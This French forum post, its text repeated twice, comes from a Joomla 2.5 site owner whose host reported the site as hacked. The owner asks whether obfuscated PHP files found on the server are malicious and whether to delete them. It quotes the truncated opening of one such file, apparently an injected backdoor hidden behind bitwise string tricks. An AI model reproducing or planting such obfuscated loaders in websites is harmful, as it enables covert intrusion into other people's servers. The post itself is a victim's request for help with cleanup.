Bonjour à tous,
Mon hébergeur vient de me dire que mon site avait était piraté et que je devais "faire le ménage".
J'utilise Joomla 2.5 et ma version n'était pas à jour, ce qui est réglé maintenant.
L'hébergeur utilise un script qui scanne les fichiers php et il m'a remonté une liste, non exhaustive, des fichiers suspicieux.
J'ai commencé à balayer, via FileZilla, tous les fichiers du site à la recherche des fichiers frauduleux. J'ai remarqué que certains répertoires et/ou fichiers avaient été modifiés à une date où j'étais absent, donc incapable de modifier quoi que ce soit. J'ouvre systématiquement les fichiers php dans Notepad++, chaque fois que je tombe sur un fichier véreux, celui-ci est de la forme :
<?php
$VKHYo_GX='Lzceebm'|arOjd;$fuLp='|M&0*:h]GiX'|'h`'.PUdQLi7h6;$SNndftn="Gb`JBM].|"./*vbiN'.
'krw)_%EGf*/FC4Io."@"|frMiv.'"'.VDQl.'"`!-~';$Aq='`s%@0%_%'.U0j5adn|'K@W!E`TV%'.
'N{DH+.';$BCzDW=VStHZw0M.'<|xNp*cUY,'.RUlu.'@'^'gg E*9'.BRuZMH.'*GI['.dhMde.#qB'.
etc.
Totalement incompréhensible pour moi !!! Les fichiers officiels php étant parfaitement lisibles, j'en déduis donc qu'il faut supprimer tous les fichiers de ce type !
Pour le moment, je me suis contenté de renommer les fichiers en .old, pour éviter leur activation.
Que me conseillez-vous ? Continuer mon travail de fourmi et supprimer ces fichiers les uns après les autres ?
Ces fichiers sont bien vérolés ?
A noter que le site fonctionne apparemment sans problème.
Merci d'avance pour vos conseils !
Mon hébergeur vient de me dire que mon site avait était piraté et que je devais "faire le ménage".
J'utilise Joomla 2.5 et ma version n'était pas à jour, ce qui est réglé maintenant.
L'hébergeur utilise un script qui scanne les fichiers php et il m'a remonté une liste, non exhaustive, des fichiers suspicieux.
J'ai commencé à balayer, via FileZilla, tous les fichiers du site à la recherche des fichiers frauduleux. J'ai remarqué que certains répertoires et/ou fichiers avaient été modifiés à une date où j'étais absent, donc incapable de modifier quoi que ce soit. J'ouvre systématiquement les fichiers php dans Notepad++, chaque fois que je tombe sur un fichier véreux, celui-ci est de la forme :
<?php
$VKHYo_GX='Lzceebm'|arOjd;$fuLp='|M&0*:h]GiX'|'h`'.PUdQLi7h6;$SNndftn="Gb`JBM].|"./*vbiN'.
'krw)_%EGf*/FC4Io."@"|frMiv.'"'.VDQl.'"`!-~';$Aq='`s%@0%_%'.U0j5adn|'K@W!E`TV%'.
'N{DH+.';$BCzDW=VStHZw0M.'<|xNp*cUY,'.RUlu.'@'^'gg E*9'.BRuZMH.'*GI['.dhMde.#qB'.
etc.
Totalement incompréhensible pour moi !!! Les fichiers officiels php étant parfaitement lisibles, j'en déduis donc qu'il faut supprimer tous les fichiers de ce type !
Pour le moment, je me suis contenté de renommer les fichiers en .old, pour éviter leur activation.
Que me conseillez-vous ? Continuer mon travail de fourmi et supprimer ces fichiers les uns après les autres ?
Ces fichiers sont bien vérolés ?
A noter que le site fonctionne apparemment sans problème.
Merci d'avance pour vos conseils !
Commentaire